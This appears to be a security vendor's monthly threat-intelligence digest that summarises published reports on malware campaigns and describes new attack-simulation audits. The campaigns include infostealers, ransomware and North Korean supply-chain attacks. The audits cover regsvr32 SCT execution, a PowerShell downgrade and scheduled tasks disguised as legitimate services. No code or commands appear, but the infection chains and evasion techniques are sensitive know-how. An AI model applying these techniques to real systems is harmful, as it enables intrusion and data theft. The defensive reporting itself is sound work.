Our Application and Threat Intelligence Research Center has been busy in July, creating simulations of the latest cyber threats to help our customers and partners stay safe. Threat Simulator replicates these real-world threats, allowing you to safely test your controls to ensure that your security posture is prepared, armed with identifiable Indicators of Compromise (IOC).
This month, we have witnessed a range of activities, from North Korean threat actors targeting supply chains, to Cybercartels attacking financial institutions in Latin America, and Vietnamese attackers tricking Facebook business account users. Additionally, Belarusian groups have been targeting Ukrainian and Polish institutions with malicious macros.
Read on to learn how we can assist you in maintaining your safety, no matter where you are in the world.
New Threat Campaigns
Episode V: Cybercartel strikes back:
Metabase Q released a report about a campaign done by Cybercartel group which targets financial institutions in Mexico and Chile to steal information for financial gains.
It starts via phishing websites where a pop-up window appears that tricks the user into installing a fake safeguard tool. This downloads a zip file containing code to download additional files via WebDev protocol. This files contain obfuscated code that after deobfuscation downloads another 2 files.
First one corresponds to a set of files with different information stealing capabilities. The second one is a bat file that installs an extension on the browser to allow the files on the first set to run on the compromised machine for financial gains.
Ransomware Delivery URLs: Top Campaigns and Trends:
Unit42 published statistics regarding ransomware delivery methods, their malicious functionalities and the most popular ransomware family observed during attacks.
The vast majority of ransomware are still delivered by deceiving users while browsing, while email represents the second most popular alternative.
Regarding ransomware family, Lazy, Virlock and REvil represent the top 3 most prevalent variants.
Social media represents the main method of hosting malicious samples.
Infostealer Distributed via CHM Files:
Ahnlab has published a report about a CHM-type malware that impersonates different Korean financial institutes and tricks users into installing an Infostealer.
At first, the malware starts from a simple Windows program exe file. After the process is run, it executes Windows help files (CHM) that decompile and run a file containing a wscript.
The wscript adds a registry key which runs a Powershell command that downloads and installs the Infostealer. It is small in size and sends the data to the threat actor in a compressed file format.
Akira Ransomware Extends Reach to Linux Platform:
Cyble Research and Intelligence Labs have observed that a threat group, known as Akira and specialized in ransomware attacks, has improved their malware to be executed on the Linux platform.
The group is responsible with attacks in various countries and industries and their malware is capable of encrypting files and shared network drives.
In addition, it maintains a list of file extensions and only encrypts files with those extensions.
Regarding the encryption process, the ransomware uses a pre-determined public key embed into its code which is used in different block cyphers such as AES-CBC.
Decrypted: Akira Ransomware:
Avast researchers released a report regarding their file decryptor program working against Akira ransomware on Windows and Linux platforms.
Previous research reports from other vendors only identified a single Linux compatible binary containing the ransomware.
The Windows Akira variants have been developed in C++, utilizing popular libraries such as Boost and have the capability to change their encryption algorithm based on the size of the targeted file.
Tomcat Under Attack: Exploring Mirai Malware and Beyond:
Aqua Nautilus published a report about attacks on their Tomcat server honeypots which exploit a misconfiguration of weak user and password configuration.
The threat actors are looking towards misconfigurations in the Tomcat web application manager, on which they perform brute force attacks to guess the passwords for the users authorized to access Tomcat resources.
After gaining access, the threat actor deploys a WAR file containing a malicious web shell that enables the threat actor to remotely execute code on the server. Then, the threat actor downloads another script that performs different actions, including downloading binary files, based on the architecture.
In the end, this malware is used to perform different kinds of attacks, such as cryptomining or DDoS attacks.
Into the tank with Nitrogen:
Sophos published their findings regarding Nitrogen malware family, the infection chain and its malicious features.
Nitrogen’s infection chain shares similarities with the one assigned to BlackCat ransomware. Victims may be deceived to access malicious advertisements redirecting to fake websites from which they can install popular IT tools such as WinSCP and AnyDesk.
The trojanized applications come bundled with the Python runtime environment and a malicious Python package which installs the NitrogenStager.
Through various techniques such as DLL sideloading or proxying the Nitrogen malware family installs penetration testing tools such as Metasploit and CobaltStrike, from which attackers can open remote sessions or execute remote code.
Decoy Dog is No Ordinary Pupy: Separating a Sly DNS Malware from the Pack:
Infoblox released a report regarding a sophisticated and complex malware that is beyond average threat actors, called Decoy Dog, a program which communicates with the C2 server over DNS.
Decoy Dog variants have been found starting from May 2022, all of them sharing the same feature: built on top of an open-source tool called Puppy.
Decoy Dog has the capability of communicating with the C2 server, although the type of data sent is still a mistery, and allow attackers to execute remote Java code.
Threat Actor Targeting Developers via Trojanized MS Visual Studio:
Cyble released a report about an information stealer malware that is delivered through a malicious installer disguised as a genuine Microsoft Visual Studio installer.
This malware stores basic stolen data such as username/name in a text file and then it procedes to collect cookies from the browsers installed. The data is then stored as text files.
In the end, the malware connects to a Telegram bot and sends all the stolen data, then it deletes it.
Hibernating Qakbot: A Comprehensive Study and In-depth Campaign Analysis:
Zscaler ThreatLabz published multiple case studies in which attackers used a wide variety of file formats to deploy and execute Qakbot malware, specialized in banking credential theft.
The presented attack scenarios share the same feature to be executed in multiple phases and utilizing numerous file formats, from popular and easily detectable such as JavaScript, PowerShell and Windows Script Files, to more ubiquitous obscure ones such as eXtended HTML (XHTML), Excel add-in link libraries (XLL) and XMLHTTP.
The complexity of the attacks is also reflected in the big number of Tactics, Techniques, and Procedures (TTPs) which enforces the idea that Qakbot is a dangerous malware susceptible to continuous evolution.
Apple Crimeware | Massive Rust Infostealer Campaign Aiming for macOS Sonoma Ahead of Public Release:
SentinelOne discovered several blockchain games to be the spread vectors for a Rust-based infostealer named “realst” targeting both Windows and MacOS.
The victims were initially contacted by various individuals portraying to be community managers looking for game testers. If the victim accepts the offer, they will be given an archive containing several Python scripts along with various file formats such as disk images, Electron apps or native application bundles containing both the game and the main infostealer.
The “realst” infostealer can gather browser password keychains, cryptowallet credentials and desktop screenshots while also finding out if the running environment is sandboxed or not.
PurpleFox Being Distributed via MS-SQL Servers:
Ahnlab has published a report about PurpleFox malware, a Loader which mainly installs CoinMiners and targets poorly managed MS-SQL servers.
A powershell is executed by a corrupted file. It executes a command which downloads a MSI and also invokes scripts that allows the threat actor to install the malware as an admin user through privilege escalation.
In the end, it changes a registry key and reboots the system, activating the malware.
North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack:
Mandiant discovered that a previous compromise attack on an access management service called JumpCloud, enabled a North Korean group labeled as UNC4899, to spread their backdoors to downstream clients.
The JumpCloud vulnerability allowed attackers to execute remote code on victim machines, resulting in running a malicious Ruby downloader which installed the first stage backdoor FULLHOUSE.DOORED.
Utilizing this first-stage malware, other more complex backdoors such as STRATOFEAR and TIEDYE are downloaded, configured and executed.
Finally, the attacker can execute remote commands and communicate discreetly with the victim computer through a custom-made protocol.
Fabricated Microsoft Crypto Wallet Phishing Site Spreads Infostealer:
Cyble Research and Intelligence Labs has released an article about phishing operations posing as the beta version of Microsoft Crypto Wallet.
Once a victim falls to this scam, an open source infostealer written in Rust called Luca Stealer is executed. This program is capable of altering crypto wallet addresses and IBANs stored in the clipboard buffer to point to addresses controlled by the attackers.
In addition, the stealer can detect if the victim environment is virtualized using information such as system temperature.
Finally, gathered information is exfiltrated via Telegram API.
Threat Group Assessment: Mallox Ransomware:
Unit42 have shown their concerns regarding the increased number of ransomware attacks done by the Mallox threat group.
The attackers successfully gain control over exposed MS-SQL servers systems through numerous attempts to guess the credentials, technique known as brute force attack. Afterwards, a PowerShell script downloads the Mallox ransomware.
Finally, it disables data recovery and backup, terminates antivirus programs, bypasses an anti-ransomware mechanism and encrypts files.
Kanti: A NIM-Based Ransomware Unleashed in the Wild:
Cyble has shared updates regarding the news of Dark Power utilizing new programming languages, such as Nim, to build a new ransomware called Kanti.
It is initially delivered through phishing emails and it is disguised as an archive. Once executed, it will only encrypt files having a certain extension deemed by the ransomware to not disrupt the whole system if the file is encrypted.
From recent observations, it seems that the ransomware is targetting cryptocurrency users.
P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm:
Unit42 has discovered a worm, called P2PInfect written in Rust, targeting Redis instances located in cloud environments using the CVE-2022-0543.
The vulnerability consists of loading external modules and libraries in the existing Lua scripting language runtime which is delivered together with the Redis components.
Attackers have implemented a Rust program which exploits this weakness in order to enable the victim host to start communication with a peer-to-peer network from which it receives further commands.
FakeSG enters the ‘FakeUpdates’ arena to deliver NetSupport RAT:
Malwarebytes released an article regarding NetSupportRAT, malware that is masked as a browser installer. It is first seen as an “update” to the existing browser.
The installation is based on a fake installer downloaded from a compromised website. This retrieves a script that runs and downloads the malware.
Finally this malware collects data and sends it at a C2 server.
BYOS – Bundle Your Own Stealer:
Check Point Research published an article explaining how .NET compilation feature can be used by attackers to deliver BundleBot discreetly and to harden the analysis done by security researchers.
This feature allows developers to share their applications which also include the whole .NET runtime resulting in easier configuration and no software dependency installation.
BundleBot uses the same tactic and is initially downloaded through fake Facebook Ads.
Once executed, it steals Discord and Telegram tokens, browser cookies, credentials and credit cards, finally sending them as an archive to the C2 server.
FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware:
Symantec released a report regarding Syssphinx, a threat group, which reworked their backdoor, Sardonic, to be more elusive in order to successfully deliver the Noberus ransomware.
The attacks linked to the backdoor start with a Powershell script which gathers information regarding the victim system architecture and chooses the appropriate .NET injector.
The injector decrypts the malicious backdoor embedded into it and prepares its runtime.
The recently observed backdoor variant can run credencial stealing tools such as Impacket and start communication with the C2 server through custom network protocols.
Diplomats Beware: Cloaked Ursa Phishing With a Twist:
Unit42 released a report regarding Russia’s Foreign Intelligence Service attempts to spread malware to foreign embassies in Kiev through fake advertisement and semiformal government-to-government diplomatic communications.
The first event related to this campaign: a fake advertisement for selling a car formerly used by a Polish diplomat. The document presents a URL from which photographs of the subject car can be downloaded from. Besides these photographs, a malware is also downloaded and executed and will try to communicate with a C2 server using Microsoft Graph or Dropbox API.
The second event linked is a fake humanitarian aid document addressed to Turkish Ministry of Foreign Affairs quickly after an earthquake occurrence.
Reverse Engineering Walkthrough | Analyzing A Sample Of Arechclient2:
SentinelOne along with independent researchers have analyzed a malware strain related to Arechclient2 malware family, capable of C2 communication, loading various other malicious payloads and information stealing.
The attack starts with an archive that contains binary files originating from a program written in a scripting language for Windows named AutoIt. These files are also delivered along with the legitimate AutoIt runtime in order to be executed.
The script files finally load a heavily obfuscated malicious .NET payload which utilizes a technique known as “process hollowing” to hijack a genuine process in order to start C2 communication.
CustomerLoader: a new malware distributing a wide variety of payloads:
Sekoia Threat & Detection Research Team discovered a new Loader-as-a-Service named CustomerLoader, purchased by various threat actors to deploy and load their malicious payload without being detected.
CustomerLoader is a .NET executable which presents data obfuscation and C2 communication properties. In addition, it can bypass Microsoft’s Antimalware Interface Scan feature by patching with a function that will always flag the program as benign.
Delivering other malicious payloads is done by reflective code technique to execute the payload in memory.
The malware has been linked to 3 incidents in which phishing emails, YouTube compromised channels and fake Slack website were used as spread environments.
BlotchyQuasar: X-Force Hive0129 targeting financial institutions in LATAM with a custom banking trojan:
IBM Security X-Force discovered that a threat group (Hive0129) is targeting users in Latin America in order to steal internet baking credentials using a new malware called BlotchyQuasar.
The remote access trojan is built on top of the open-source malware QuasarRAT, however with numerous new functionalities such as antivirus evasion, obfuscated C2 communication and credential extraction.
The attack initially starts with phishing emails mimicking government agencies which present a malicious .NET loader attachment called RoboSki.
The stealer is later deployed along with various third-party tools for C2 communication.
Finally, BlotchyQuasar gains persistence, disables various antivirus options, collects keystrokes and steals browser information whenever a banking website is opened.
Malicious campaigns target government, military and civilian entities in Ukraine, Poland:
Cisco Talos provided details about a Belarusian threat actor labeled UNC1151 that has targeted Ukrainian and Polish institutions using Microsoft Office documents embedded with malicious macros.
These macros, implemented in VBA, download or deploy further malware associated with post-exploitation phases of the attack, such as PicassoLoader, njRAT and Cobalt Strike.
Having installed a wide variety of malicious tools, the actors have been able to exfiltrate sensitive data and achieve communication with the C2 server.
Cloudy With a Chance of Credentials | AWS-Targeting Cred Stealer Expands to Azure, GCP:
SentinelOne released a report regarding an expansion of the attack surface in the cloud environment, with threat actors such as TeamTNT targeting now Google Cloud Platform besides Amazon Web Services.
The attacker gained credentials from both AWS and GCP from unpatched Jupyter Notebook endpoints. Using these credentials, they deploy various shell scripts for reconnaissance purposes. Through the information gained, researchers observed a great interest in exposed Docker containers.
Propagation is done through a binary, Go compiled program, embedded with a network scanning tool.
Trojanized Application Preying on TeamViewer Users:
Cyble published an article explaining how attackers exploit the trust of popular applications, such as TeamViewer, to deliver njRAT for information stealing.
The installer contains both a genuine TeamViewer instance and the njRAT, an open-source remote access trojan.
Afterwards, the trojan gains persistence on the victim system and makes sure that the computer can not be exploited multiple times by the same attack.
Finally, it logs key strokes and system information about the current Windows operating system along with communicating with the C2 server for remote command execution.
PoC Exploit: Fake Proof of Concept with Backdoor Malware:
Uptycs researchers have discovered a novel Linux backdoor disguised as a fake Proof-of-Concept exploit tutorial for CVE-2023-35829.
The code is built upon an older Proof-of-Concept CVE-2022-34918, however with modified components which gain persistence on the victim computer and disguise as a system-level process.
The backdoor is capable of escalating privileges and can download further malicious programs during post-exploitation phase.
Criminals target businesses with malicious extension for Meta’s Ads Manager and accidentally leak stolen accounts:
Malwarebytes Labs has released a report regarding Vietnamese attackers tricking Facebook business account users to download malware resulting in hijacking the account.
The actors utilize popular verified accounts to advertise their application which is stated to be more efficient in managing advertising campaigns than the official Meta application.
Once downloaded, it injects a malicious browser extension which steals Facebook credentials and exfiltrate them through Google Analytics to bypass browser defensive mechanisms.
Six Malicious Python Packages in the PyPI Targeting Windows Users:
Unit42 discovered a W4SP imitator which has uploaded malicious Python packages on PyPI with the purpose of stealing information.
A similar campaign uncovered a complex operation which tried to disguise malicious code in genuine Python scripts. However, the current attacker’s Python packages lack evasion and masquerading techniques. Judging by the limited number of uploaded packages, their simplicity and utilization of other malicious components from other attackers, the current actor poses a lesser threat than the original W4SP.
Once credentials of Windows applications and crypto wallets are collected, the malware exfiltrates them to a Discord webhook.
The Spies Who Loved You: Infected USB Drives to Steal Secrets:
Mandiant published a report regarding cyber espionage operations involving infected USB flash drives.
The article analyzes 2 malware which were increasingly encountered: SOGU and SNOWYDRIVE.
SOGU represents a backdoor developed in C and has been observed to be packed together with a malicious loader called KORPLUG which is responsible to start the backdoor. These software components are developed by a Chinese espionage group called TEMP.Hex and are capable of keylogging, exfiltrating file contents and remote command execution.
SNOWYDRIVE is also delivered through infected USB drives and is capable of file exfiltration, file uploads and remote command execution. The malware was used across Asia to target oil and gas companies and it is developed by UNC4698 threat actor.
Analysis of the Rekoobe Backdoor Being Used In Attacks Against Linux Systems in Korea:
AhnLab released a report regarding Rekoobe backdoor targeting Linux servers located in Korea.
The malware is delivered in a binary executable format and is inspired by an open-source tool called TinySHell.
Once executed, it behaves and appears as a benign process and opens reverse shell communication with a C2 server.
Observations showed that Rekoobe is used by Chinese threat group actor APT31.
Malicious Batch File (*.bat) Disguised as a Document Viewer Being Distributed (Kimsuky):
AhnLab released a report regarding a campaign, presumably run by Kimsuky threat actor, in which the attack pattern has a polymorphic behavior based on the antivirus solution found on the targeted system.
The initial step is represented by phishing emails containing Windows batch files. Once executed, Google Drive and Google Docs are accessed in order to execute other scripts uploaded there.
A unique feature of the attack is identifying the existing antivirus running process and choose what malicious scripts can be downloaded and executed in the next steps. In this moment, the attacker implemented custom adaptive behavior against Kaspersky, Avast and AhnLab.
The TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region:
Zscaler TheartLabz has uncovered a complex targeted campaign against businesses in Latin America, involving custom-built, multi-phase malware.
The initial phase starts with phishing emails attached with an archive containing a downloader program. This program is responsible with downloading files linked to the next phases of the attack.
Afterwards, Krita Loader is executed with the intent of decrypting and preparing subsequent phases.
The third phase comes with InjectorDLL which injects itself into a benign process to avoid detection and starts detecting whether the targeted system is a sandbox environment or not. If it is, it forcefully restarts the system.
The last 2 phases are remarked by the privilege escalation attempts and information stealing using TOITOIN Trojan.
The five-day job: A BlackByte ransomware intrusion case study:
Microsoft Incident Response has discovered an evolved ransomware attack exploiting unsecured Windows Exchange Servers in order to spread the attack to all computers residing in the internal network or Active Directory environment.
The initial infection vector uses ProxyShell vulnerabilities dated from 2021 which allows an attacker to execute remote commands on the targeted system.
The second phase is downloading various benign tools such as AnyDesk, Cobalt Strike and NetScan for network reconnaissance and C2 communication purposes. In addition, a custom-made backdoor is also executed which gathers information about existing antivirus solutions.
The final target of the attack is to encrypt local and remote files residing in the internal network using ExByte, a tool written in Go attributed to BlackByte ransomware incidents.
Distribution of NetSupport Malware Using Email:
AhnLab discovered an attack involving NetSupport remote access tool delivery and unlawful usage to gain control over targeted systems.
The initial gateway through which the attack succeeds is represented by phishing emails containing a JavaScript file. Once executed, it can decrypt Powershell commands embedded in it, execute them and connect to the C2 server for downloading other malware.
Finally, it downloads NetSupport tool for gaining persistent control over the system.
Increased Truebot Activity Infects U.S. and Canada Based Networks:
CISA along with FBI and Canadian Centre for Cyber Security released a joint report regarding a new malware called Truebot which is delivered through phishing or a vulnerability in Netwrix Auditor application (CVE-2022-31199).
Once executed, Truebot installs a remote access tool called FlawedGrace which establishes connection with the C2 server. In addition, it can load various libraries (DLLs) for execution.
A second tool Truebot prepares on the victim computer is Cobalt Strike, program used by security researchers to emulate known attacks.
The purpose of Truebot is to gather information about running processes, network domain of the computer and deploy various third-party tools.
Kimsuky Threat Group Using Chrome Remote Desktop:
AhnLab Security Response Center published a report regarding a North Korean group called Kimsuky, observed to include Chrome Remote Desktop alongside AppleSeed backdoor to steal information from affected systems.
The initial infection starts from spear phishing emails which contain documents enriched with malicious scripts that drop the AppleSeed backdoor.
This backdoor is capable of installing additional malware, keylogging, capturing screenshots, stealing files and C2 communication for further commands to be executed.
In addition, AppleSeed will interact with the Chrome web browser to force the infected machine to be controlled remotely.
BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection:
SentinelOne released a report regarding a new variant of RustBucket macOS backdoor delivered by a North-Korean threat group called BlueNoroff.
The initial attack vector is represented by a fake PDF Viewer app which the victim is tricked to install in order to see protected documents. This app is a compiled AppleScript sample used to drop the second stage.
The second phase is represented by binaries of Swift and Objective-C origins which download the main backdoor.
Finally, the Rust-based backdoor known as RustBucket gains persistence and has the ability to execute commands from the C2 server and gather disk information.
Email crypto phishing scams: stealing from hot and cold crypto wallets:
Securelist researchers have documented various cryptocurrency phishing scams used to compromise both hot and cold wallets using a cloned cryptocurrency exchange app called Ripple.
Since hot wallets are always connected to the Internet and are used frequently in small scale transactions, they do not impose an important target for attackers. Malicious techniques have remained rather primitive through spam emails.
Cold wallets however represent storage mediums which are not always connected to the Internet, usually containing higher amounts of currencies.
Attackers successfully cloned a popular exchange app, Ripple, which tricks victims to leak their wallet credentials. Authentication is done using genuine third-party apps such as Ledger or Trezor.
Threat Alert: Anatomy of Silentbob’s Cloud Attack:
Aqua Nautilus researchers have found a new campaign initiated by TeamTNT threat actor, which targets misconfigured cloud environments through JupyterLabs servers that support Docker.
The attackers make use of custom-made Docker images that contain scanning tools, used for reconnaissance in lateral movement and malware spread, and malicious applications such as crypto miners and Tsunami backdoor.
All gathered information is sent back to a C2 server which instructs the malicious Docker containers what other servers can be compromised.
The attacker poses a great threat due to extensive technical knowledge reflected in how they hide their infrastructure using NGROK hosting services and leave minimal traces using Anondns.
PhonyC2: Revealing a New Malicious Command & Control Framework by MuddyWater:
Deep Instinct Threat Lab released a report regarding a novel post-exploitation framework, called PhonyC2, created by an Iranian threat group called Muddy Water.
This framework, written in Python 3, can be considered an adaptation of previous frameworks such as POWERSTATS and MuddyC3 implemented in deprecated Python 2.
It provides various features such as deobfuscating and executing payloads sent by the C2 server, gaining persistence on the target machine and downloading various third party tools.
Chinese Threat Actors Targeting Europe in SmugX Campaign:
Check Point Research has uncovered a cyber espionage campaign started by a new Chinese threat actor, which has targeted European embassies and Foreign Affairs ministries.
In order to evade detection as much as possible, the attacker uses a technique called HTML Smuggling, which consists of embedding into HTML documents various JavaScript components which mimic user interaction events, such as clicks, in order to trick the browser into downloading malicious files.
The next phase of the attack is executing previously downloaded files, such a Powershell script which further downloads a remote access tool (RAT), called PlugX. This modular tool is capable of gathering information such as keystrokes, screen captures and browser information and send them to the C2 server.
New audits
Regsvr32 – ‘regsvr32.exe’: Execute remote SCT file with VBScript (Command Prompt) Technique T1218.010, Tactic TA0005
Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.
Adversaries may abuse regsvr32.exe to execute a remote .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains VBScript code.
Regsvr32 – ‘regsvr32.exe’: Execute SCT file with VBScript (CommandPrompt) Technique T1218.010, Tactic TA0005
Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.
Adversaries may abuse regsvr32.exe to execute a local .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains VBScript code.
Downgrade attack – powershell: Force powershell lower version execution (Power Shell) Technique T1562.010, Tactic TA0005
Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging.
This audit downgrades the powershell version to the desired value, however the chosen version must be lower than the one used by default on the system.
After downgrading, the audit executes a command specific to the default version which is not present in the downgraded one in order to verify if the audit executed successfully.
Masquerade Task or Service – ‘schtasks.exe’: Create a scheduled task masqueraded as ‘AdobeFlashSync’ (Command Prompt) Technique T1036.004, Tactic TA0005
Scheduled Task Service is a Microsoft Windows service allowing administrator to create, delete, query, change, run and end scheduled tasks on a local or remote machine.
This audit uses the ‘schtasks.exe’ command to create a scheduled task of a non-related AdobeFlashSync service with the name AdobeFlashSync to establish persistance.
Adobe Flash Sync is a legitimate service of Adobe Flash Player. It is designed to synchronize user settings and data across multiple devices.
Masquerade Task or Service – ‘schtasks.exe’: Create a scheduled task masqueraded as ‘Windows Update Agent1’ (Command Prompt) Technique T1036.004, Tactic TA0005
Scheduled Task Service is a Microsoft Windows service allowing administrator to create, delete, query, change, run and end scheduled tasks on a local or remote machine.
schtasks.exe is an included binary that interfaces with the Task Scheduler service to enable an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
This audit uses the ‘schtasks.exe’ command to create a scheduled task of a non-related Windows Update service with the name Windows Update Agent1 to establish persistance and to look like a legitimate service.
‘Windows Update Agent1’ is a name similar to ‘Windows Update Agent’, which is a Windows system service that manages the installation of updates and hotfixes on a computer running the Windows operating system.